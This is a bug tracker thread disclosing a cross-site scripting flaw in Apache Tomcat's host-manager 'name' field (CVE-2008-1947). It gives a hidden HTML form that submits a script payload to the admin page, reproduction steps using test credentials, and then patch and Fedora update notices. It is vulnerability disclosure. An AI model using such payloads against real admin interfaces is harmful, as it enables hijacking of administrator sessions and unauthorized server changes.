Similarly as "alias" field in bug 247994 tomcat's host manager web interface suffers from javascript exploit in the "name" field: Assume that after logged in, the victim was lead to the malicious web server with following file installed. <form action="http://localhost:8080/host-manager/html/add" method="get"> <INPUT TYPE="hidden" NAME='name' VALUE="<script>alert()</script>"> <INPUT TYPE="hidden" NAME='aliases' VALUE="somealias"> <input type="submit"> </form> Steps to reproduce: * install tomcat5 tomcat5-admin-webapps. * edit /etc/tomcat5/tomcat-users.xml and add <role rolename="tomcat"/> <user username="tomcat" password="tomcat" roles="tomcat,admin"/> * restart tomcat5 * Visit http://localhost:8080/host-manager/html/add * login with user name tomcat and password tomcat * Enter the following: name: <script>alert("name-exploit!")</script> alias: somealias * hit add. * You should see the javascript alert box popping up.
Public patch available here: http://svn.apache.org/viewvc?view=rev&revision=662582
Public now via: http://marc.info/?l=tomcat-user&m=121244319501278&w=2 http://tomcat.apache.org/security-5.html http://tomcat.apache.org/security-6.html Will be fixed upstream in the upcoming 5.5.27 and 6.0.17.
tomcat6-6.0.18-1.1.fc9 has been submitted as an update for Fedora 9. http://admin.fedoraproject.org/updates/tomcat6-6.0.18-1.1.fc9
tomcat6-6.0.18-1.1.fc9 has been pushed to the Fedora 9 stable repository. If problems still persist, please make note of it in this bug report.
tomcat5-5.5.27-0jpp.1.fc8 has been submitted as an update for Fedora 8. http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.1.fc8
tomcat5-5.5.27-0jpp.2.fc9 has been submitted as an update for Fedora 9. http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.2.fc9
tomcat5-5.5.27-0jpp.2.fc8 has been submitted as an update for Fedora 8. http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.2.fc8
tomcat5-5.5.27-0jpp.2.fc9 has been pushed to the Fedora 9 stable repository. If problems still persist, please make note of it in this bug report.
tomcat5-5.5.27-0jpp.2.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
https://www.redhat.com/security/data/cve/CVE-2008-1947.html